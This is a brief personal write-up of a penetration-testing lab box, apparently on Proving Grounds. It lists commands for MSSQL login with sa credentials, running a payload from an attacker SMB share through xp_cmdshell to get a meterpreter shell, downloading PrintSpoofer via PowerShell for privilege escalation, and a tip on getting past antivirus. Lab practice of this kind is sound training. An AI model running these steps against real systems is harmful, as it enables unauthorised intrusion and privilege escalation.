PG Meathead
impacket-mssqlclient sa:EjectFrailtyThorn425@192.168.230.70 -p 1435 smbserver.py Share . xp_cmdshell \\192.168.49.210\Share\power.exe (meterpreter shell) powershell Invoke-WebRequest -OutFile C:\Users\Public\Documents\PrintSpooferx64.exe -Uri http://192.168.49.210/PrintSpooferx64.exe
Box is hard. Only got shell. Had to lookup walkthroughs. Its okay, as long as I learn something and don't repeat the same mistake again. I'll be using smbserver over http.server, just to get the hang of it. It will become a permanent jutsu of mine from now on.
Lessons Learned
- Set up a smbserver.py if downloading is not working and/or Antivirus is getting in the way.
- My PrintSpoofer worked. Metasploit getsystem will also use PrintSpoofer.
- First Hard Box on PG attempted.
Comments
Post a Comment